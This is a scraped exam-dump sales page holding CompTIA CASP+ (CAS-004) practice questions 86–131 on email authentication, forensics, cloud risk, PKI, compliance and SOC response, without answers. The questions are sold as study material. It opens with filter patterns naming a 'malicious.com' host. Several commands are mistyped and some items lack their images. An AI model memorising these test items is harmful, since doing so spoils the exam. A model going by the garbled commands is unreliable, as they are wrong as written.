www\. malicious\. com\/malicious. php

C.

POST /malicious\. php

D.

Hose: [a-2] *\.malicious\.com

E.

malicious. *

Buy Now
Questions 86

A security administrator wants to detect a potential forged sender claim in tt-e envelope of an email. Which of the following should the security administrator implement? (Select TWO).

Options:

A.

MX record

B.

DMARC

C.

SPF

D.

DNSSEC

E.

S/MIME

F.

TLS

Buy Now
Questions 87

After a cybersecurity incident, a judge found that a company did not conduct a proper forensic investigation. The company was ordered to pay penalties. Which of the following forensic steps would be best to prevent this from happening again?

Options:

A.

Evidence preservation

B.

Evidence verification

C.

Evidence collection

D.

Evidence analysis

Buy Now
Questions 88

A large organization is planning to migrate from on premises to the cloud. The Chief Information Security Officer (CISO) is concerned about security responsibilities. If the company decides to migrate to the cloud, which of the following describes who is responsible for the security of the new physical datacenter?

Options:

A.

Third-party assessor

B.

CSP

C.

Organization

D.

Shared responsibility

Buy Now
Questions 89

A forensics investigator is analyzing an executable file extracted from storage media that was submitted (or evidence The investigator must use a tool that can identify whether the executable has indicators, which may point to the creator of the file Which of the following should the investigator use while preserving evidence integrity?

Options:

A.

idd

B.

bcrypt

C.

SHA-3

D.

ssdeep

E.

dcfldd

Buy Now
Questions 90

An ISP is receiving reports from a portion of its customers who state that typosquatting is occurring when they type in a portion of the URL for the ISP's website. The reports state that customers are being directed to an advertisement website that is asking for personal information. The security team has verified the DNS system is returning proper results and has no known lOCs. Which of the following should the security team implement to best mitigate this situation?

Options:

A.

DNSSEC

B.

DNS filtering

C.

Multifactor authentication

D.

Self-signed certificates

E.

Revocation of compromised certificates

Buy Now
Questions 91

In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements. The current cloud provider that the company is using offers:

• Only multitenant cloud hosting

• Minimal physical security

• Few access controls

• No access to the data center

The following information has been uncovered:

• The company is located in a known floodplain, which flooded last year.

• Government regulations require data to be stored within the country.

Which of the following should be addressed first?

Options:

A.

Update the disaster recovery plan to account for natural disasters.

B.

Establish a new memorandum of understanding with the cloud provider.

C.

Establish a new service-level agreement with the cloud provider.

D.

Provision services according to the appropriate legal requirements.

Buy Now
Questions 92

A security engineer is creating a single CSR for the following web server hostnames:

• wwwint internal

• www company com

• home.internal

• www internal

Which of the following would meet the requirement?

Options:

A.

SAN

B.

CN

C.

CA

D.

CRL

E.

Issuer

Buy Now
Questions 93

The general counsel at an organization has received written notice of upcoming litigation. The general counsel has issued a legal records hold. Which of the following actions should the organization take to comply with the request?

Options:

A.

Preserve all communication matching the requested search terms

B.

Block communication with the customer while litigation is ongoing

C.

Require employees to be trained on legal record holds

D.

Request that all users do not delete any files

Buy Now
Questions 94

in a situation where the cost of anti-malware exceeds the potential loss from a malware threat, which of the following is the most cost-effective risk response?

Options:

A.

Risk transfer

B.

Risk mitigation

C.

Risk acceptance

D.

Risk avoidance

Buy Now
Questions 95

A security engineer is assessing a legacy server and needs to determine if FTP is running and on which port The service cannot be turned off, as it would impact a critical application's ability to function. Which of the following commands would provide the information necessary to create a firewall rule to prevent that service from being exploited?

Options:

A.

service —status-ali I grep ftpd

B.

chkconfig --list

C.

neestat -tulpn

D.

systeactl list-unit-file —type service ftpd

E.

service ftpd. status

Buy Now
Questions 96

A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes. Which of the following would be best to use as part of the process to support copyright protections of the document?

Options:

A.

Steganography

B.

E-signature

C.

Watermarking

D.

Cryptography

Buy Now
Questions 97

Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

Options:

A.

Modify the ACLS.

B.

Review the Active Directory.

C.

Update the marketing department's browser.

D.

Reconfigure the WAF.

Buy Now
Questions 98

Given the following log snippet from a web server:

CAS-004 Question 98

Which of the following BEST describes this type of attack?

Options:

A.

SQL injection

B.

Cross-site scripting

C.

Brute-force

D.

Cross-site request forgery

Buy Now
Questions 99

An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs?

Options:

A.

Ladder logic

B.

Rust

C.

C

D.

Python

E.

Java

Buy Now
Questions 100

A company provides guest WiFi access to the internet and physically separates the guest network from the company’s internal WIFI. Due to a recent incident in which an attacker gained access to the compay’s intend WIFI, the company plans to configure WPA2 Enterprise in an EAP- TLS configuration. Which of the following must be installed on authorized hosts for this new configuration to work properly?

Options:

A.

Active Directory OPOs

B.

PKI certificates

C.

Host-based firewall

D.

NAC persistent agent

Buy Now
Questions 101

An organization developed a social media application that is used by customers in multiple remote geographic locations around the world. The organization’s headquarters and only datacenter are located in New York City. The Chief Information Security Officer wants to ensure the following requirements are met for the social media application:

Low latency for all mobile users to improve the users’ experience

SSL offloading to improve web server performance

Protection against DoS and DDoS attacks

High availability

Which of the following should the organization implement to BEST ensure all requirements are met?

Options:

A.

A cache server farm in its datacenter

B.

A load-balanced group of reverse proxy servers with SSL acceleration

C.

A CDN with the origin set to its datacenter

D.

Dual gigabit-speed Internet connections with managed DDoS prevention

Buy Now
Questions 102

A large number of emails have been reported, and a security analyst is reviewing the following information from the emails:

CAS-004 Question 102

As part of the image process, which of the following is the FIRST step the analyst should take?

Options:

A.

Block the email address carl b@comptia1 com, as it is sending spam to subject matter experts

B.

Validate the final "Received" header against the DNS entry of the domain.

C.

Compare the 'Return-Path" and "Received" fields.

D.

Ignore the emails, as SPF validation is successful, and it is a false positive

Buy Now
Questions 103

A company's Chief Information Officer wants to Implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide Information on attempted attacks, and provide analysis of malicious activities to determine the processes or users Involved. Which of the following would provide this information?

Options:

A.

HIPS

B.

UEBA

C.

HlDS

D.

NIDS

Buy Now
Questions 104

A company just released a new video card. Due to limited supply and high demand, attackers are employing automated systems to purchase the device through the company's web store so they can resell it on the secondary market. The company's intended customers are frustrated. A security engineer suggests implementing a CAPTCHA system on the web store to help reduce the number of video cards purchased through automated systems. Which of the following now describes the level of risk?

Options:

A.

Inherent

B.

Low

C.

Mitigated

D.

Residual.

E.

Transferred

Buy Now
Questions 105

An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PI I and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. The assessment identifies the following:

1) There will be a 520,000 per day revenue loss for each day the system is delayed going into production.

2) The inherent risk is high.

3) The residual risk is low.

4) There will be a staged deployment to the solution rollout to the contact center.

Which of the following risk-handling techniques will BEST meet the organization's requirements?

Options:

A.

Apply for a security exemption, as the risk is too high to accept.

B.

Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service.

C.

Accept the risk, as compensating controls have been implemented to manage the risk.

D.

Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.

Buy Now
Questions 106

A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines:

Must have a minimum of 15 characters

Must use one number

Must use one capital letter

Must not be one of the last 12 passwords used

Which of the following policies should be added to provide additional security?

Options:

A.

Shared accounts

B.

Password complexity

C.

Account lockout

D.

Password history

E.

Time-based logins

Buy Now
Questions 107

A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output.

The best option for the auditor to use NEXT is:

CAS-004 Question 107

Options:

A.

A SCAP assessment.

B.

Reverse engineering

C.

Fuzzing

D.

Network interception.

Buy Now
Questions 108

A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP:

• Enforce MFA for RDP

• Ensure RDP connections are only allowed with secure ciphers.

The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network-level firewalls Of ACLs.

Which of the following should the security architect recommend to meet these requirements?

Options:

A.

Implement a reverse proxy for remote desktop with a secure cipher configuration enforced.

B.

Implement a bastion host with a secure cipher configuration enforced.

C.

Implement a remote desktop gateway server, enforce secure ciphers, and configure to use OTP

D.

Implement a GPO that enforces TLS cipher suites and limits remote desktop access to only VPN users.

Buy Now
Questions 109

An organization recently started processing, transmitting, and storing its customers’ credit card information. Within a week of doing so, the organization suffered a massive breach that resulted in the exposure of the customers’ information.

Which of the following provides the BEST guidance for protecting such information while it is at rest and in transit?

Options:

A.

NIST

B.

GDPR

C.

PCI DSS

D.

ISO

Buy Now
Questions 110

Which of the following allows computation and analysis of data within a ciphertext without knowledge of the plaintext?

Options:

A.

Lattice-based cryptography

B.

Quantum computing

C.

Asymmetric cryptography

D.

Homomorphic encryption

Buy Now
Questions 111

A company publishes several APIs for customers and is required to use keys to segregate customer data sets.

Which of the following would be BEST to use to store customer keys?

Options:

A.

A trusted platform module

B.

A hardware security module

C.

A localized key store

D.

A public key infrastructure

Buy Now
Questions 112

A security engineer estimates the company’s popular web application experiences 100 attempted breaches per day. In the past four years, the company’s data has been breached two times.

Which of the following should the engineer report as the ARO for successful breaches?

Options:

A.

0.5

B.

8

C.

50

D.

36,500

Buy Now
Questions 113

An organization is designing a network architecture that must meet the following requirements:

Users will only be able to access predefined services.

Each user will have a unique allow list defined for access.

The system will construct one-to-one subject/object access paths dynamically.

Which of the following architectural designs should the organization use to meet these requirements?

Options:

A.

Peer-to-peer secure communications enabled by mobile applications

B.

Proxied application data connections enabled by API gateways

C.

Microsegmentation enabled by software-defined networking

D.

VLANs enabled by network infrastructure devices

Buy Now
Questions 114

A satellite communications ISP frequently experiences outages and degraded modes of operation over one of its legacy satellite links due to the use of deprecated hardware and software. Three days per week, on average, a contracted company must follow a checklist of 16 different high-latency commands that must be run in serial to restore nominal performance. The ISP wants this process to be automated.

Which of the following techniques would be BEST suited for this requirement?

Options:

A.

Deploy SOAR utilities and runbooks.

B.

Replace the associated hardware.

C.

Provide the contractors with direct access to satellite telemetry data.

D.

Reduce link latency on the affected ground and satellite segments.

Buy Now
Questions 115

A company hired a third party to develop software as part of its strategy to be quicker to market. The company’s policy outlines the following requirements:

https://i.postimg.cc/8P9sB3zx/image.png

The credentials used to publish production software to the container registry should be stored in a secure location.

Access should be restricted to the pipeline service account, without the ability for the third-party developer to read the credentials directly.

Which of the following would be the BEST recommendation for storing and monitoring access to these shared credentials?

Options:

A.

TPM

B.

Local secure password file

C.

MFA

D.

Key vault

Buy Now
Questions 116

A company is preparing to deploy a global service.

Which of the following must the company do to ensure GDPR compliance? (Choose two.)

Options:

A.

Inform users regarding what data is stored.

B.

Provide opt-in/out for marketing messages.

C.

Provide data deletion capabilities.

D.

Provide optional data encryption.

E.

Grant data access to third parties.

F.

Provide alternative authentication techniques.

Buy Now
Questions 117

A technician is reviewing the logs and notices a large number of files were transferred to remote sites over the course of three months. This activity then stopped. The files were transferred via TLS-protected HTTP sessions from systems that do not send traffic to those sites.

The technician will define this threat as:

Options:

A.

a decrypting RSA using obsolete and weakened encryption attack.

B.

a zero-day attack.

C.

an advanced persistent threat.

D.

an on-path attack.

Buy Now
Questions 118

A security engineer needs to implement a solution to increase the security posture of user endpoints by providing more visibility and control over local administrator accounts. The endpoint security team is overwhelmed with alerts and wants a solution that has minimal operational burdens. Additionally, the solution must maintain a positive user experience after implementation.

Which of the following is the BEST solution to meet these objectives?

Options:

A.

Implement Privileged Access Management (PAM), keep users in the local administrators group, and enable local administrator account monitoring.

B.

Implement PAM, remove users from the local administrators group, and prompt users for explicit approval when elevated privileges are required.

C.

Implement EDR, remove users from the local administrators group, and enable privilege escalation monitoring.

D.

Implement EDR, keep users in the local administrators group, and enable user behavior analytics.

Buy Now
Questions 119

A company’s SOC has received threat intelligence about an active campaign utilizing a specific vulnerability. The company would like to determine whether it is vulnerable to this active campaign.

Which of the following should the company use to make this determination?

Options:

A.

Threat hunting

B.

A system penetration test

C.

Log analysis within the SIEM tool

D.

The Cyber Kill Chain

Buy Now
Questions 120

A company wants to protect its intellectual property from theft. The company has already applied ACLs and DACs.

Which of the following should the company use to prevent data theft?

Options:

A.

Watermarking

B.

DRM

C.

NDA

D.

Access logging

Buy Now
Questions 121

An organization is preparing to migrate its production environment systems from an on-premises environment to a cloud service. The lead security architect is concerned that the organization's current methods for addressing risk may not be possible in the cloud environment.

Which of the following BEST describes the reason why traditional methods of addressing risk may not be possible in the cloud?

Options:

A.

Migrating operations assumes the acceptance of all risk.

B.

Cloud providers are unable to avoid risk.

C.

Specific risks cannot be transferred to the cloud provider.

D.

Risks to data in the cloud cannot be mitigated.

Buy Now
Questions 122

Clients are reporting slowness when attempting to access a series of load-balanced APIs that do not require authentication. The servers that host the APIs are showing heavy CPU utilization. No alerts are found on the WAFs sitting in front of the APIs.

Which of the following should a security engineer recommend to BEST remedy the performance issues in a timely manner?

Options:

A.

Implement rate limiting on the API.

B.

Implement geoblocking on the WAF.

C.

Implement OAuth 2.0 on the API.

D.

Implement input validation on the API.

Buy Now
Questions 123

CAS-004 Question 123

An organization is planning for disaster recovery and continuity of operations.

INSTRUCTIONS

Review the following scenarios and instructions. Match each relevant finding to the affected host.

After associating scenario 3 with the appropriate host(s), click the host to select the appropriate corrective action for that finding.

Each finding may be used more than once.

If at any time you would like to bring back the initial state of the simul-ation, please click the Reset All button.

Options:

Buy Now
Questions 124

In preparation for the holiday season, a company redesigned the system that manages retail sales and moved it to a cloud service provider. The new infrastructure did not meet the company’s availability requirements. During a postmortem analysis, the following issues were highlighted:

1. International users reported latency when images on the web page were initially loading.

2. During times of report processing, users reported issues with inventory when attempting to place orders.

3. Despite the fact that ten new API servers were added, the load across servers was heavy at peak times.

Which of the following infrastructure design changes would be BEST for the organization to implement to avoid these issues in the future?

Options:

A.

Serve static content via distributed CDNs, create a read replica of the central database and pull reports from there, and auto-scale API servers based on performance.

B.

Increase the bandwidth for the server that delivers images, use a CDN, change the database to a non-relational database, and split the ten API servers across two load balancers.

C.

Serve images from an object storage bucket with infrequent read times, replicate the database across different regions, and dynamically create API servers based on load.

D.

Serve static-content object storage across different regions, increase the instance size on the managed relational database, and distribute the ten API servers across multiple regions.

Buy Now
Questions 125

A systems administrator is in the process of hardening the host systems before connecting to the network. The administrator wants to add protection to the boot loader to ensure the hosts are secure before the OS fully boots.

Which of the following would provide the BEST boot loader protection?

Options:

A.

TPM

B.

HSM

C.

PKI

D.

UEFI/BIOS

Buy Now
Questions 126

A security analyst is reviewing the following output:

CAS-004 Question 126

Which of the following would BEST mitigate this type of attack?

Options:

A.

Installing a network firewall

B.

Placing a WAF inline

C.

Implementing an IDS

D.

Deploying a honeypot

Buy Now
Questions 127

A security analyst is performing a vulnerability assessment on behalf of a client. The analyst must define what constitutes a risk to the organization.

Which of the following should be the analyst’s FIRST action?

Options:

A.

Create a full inventory of information and data assets.

B.

Ascertain the impact of an attack on the availability of crucial resources.

C.

Determine which security compliance standards should be followed.

D.

Perform a full system penetration test to determine the vulnerabilities.

Buy Now
Questions 128

A university issues badges through a homegrown identity management system to all staff and students. Each week during the summer, temporary summer school students arrive and need to be issued a badge to access minimal campus resources. The security team received a report from an outside auditor indicating the homegrown system is not consistent with best practices in the security field and leaves the institution vulnerable.

Which of the following should the security team recommend FIRST?

Options:

A.

Investigating a potential threat identified in logs related to the identity management system

B.

Updating the identity management system to use discretionary access control

C.

Beginning research on two-factor authentication to later introduce into the identity management system

D.

Working with procurement and creating a requirements document to select a new IAM system/vendor

Buy Now
Questions 129

A company is implementing SSL inspection. During the next six months, multiple web applications that will be separated out with subdomains will be deployed.

Which of the following will allow the inspection of the data without multiple certificate deployments?

Options:

A.

Include all available cipher suites.

B.

Create a wildcard certificate.

C.

Use a third-party CA.

D.

Implement certificate pinning.

Buy Now
Questions 130

A home automation company just purchased and installed tools for its SOC to enable incident identification and response on software the company develops. The company would like to prioritize defenses against the following attack scenarios:

Unauthorized insertions into application development environments

Authorized insiders making unauthorized changes to environment configurations

Which of the following actions will enable the data feeds needed to detect these types of attacks on development environments? (Choose two.)

Options:

A.

Perform static code analysis of committed code and generate summary reports.

B.

Implement an XML gateway and monitor for policy violations.

C.

Monitor dependency management tools and report on susceptible third-party libraries.

D.

Install an IDS on the development subnet and passively monitor for vulnerable services.

E.

Model user behavior and monitor for deviations from normal.

F.

Continuously monitor code commits to repositories and generate summary logs.

Buy Now
Questions 131

A security analyst notices a number of SIEM events that show the following activity:

CAS-004 Question 131

Which of the following response actions should the analyst take FIRST?

Options:

A.

Disable powershell.exe on all Microsoft Windows endpoints.

B.

Restart Microsoft Windows Defender.

C.

Configure the forward proxy to block 40.90.23.154.

D.

Disable local administrator privileges on the endpoints.

Buy Now
Exam Code: CAS-004
Exam Name: CompTIA Advanced Security Practitioner (CASP+) Exam
Last Update: Mar 24, 2024
Questions: 439

PDF + Testing Engine

$75.95  $216.99

Testing Engine

$53.2  $151.99
buy now CAS-004 testing engine

PDF (Q&A)

$49  $139.99
buy now CAS-004 pdf
dumpsmate guaranteed to pass
24/7 Customer Support

DumpsMate's team of experts is always available to respond your queries on exam preparation. Get professional answers on any topic of the certification syllabus. Our experts will thoroughly satisfy you.

Site Secure

mcafee secure

TESTED 29 Mar 2024